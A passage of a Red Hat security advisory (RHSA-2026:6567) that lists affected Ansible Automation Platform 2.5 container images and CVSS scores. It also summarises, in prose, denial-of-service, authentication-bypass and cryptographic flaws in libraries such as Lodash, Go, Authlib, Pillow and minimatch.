"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
}
]
}
RHSA-2026:6567
Vulnerability from csaf_redhat - Published: 2026-04-03 15:21 - Updated: 2026-04-16 11:09A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect servers. The cache-backed state and request-token storage within Authlib is not securely linked to the user's initiating session. This vulnerability allows a remote attacker to exploit a Cross-Site Request Forgery (CSRF) by obtaining a valid state, which can lead to unauthorized actions being performed on behalf of the user.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---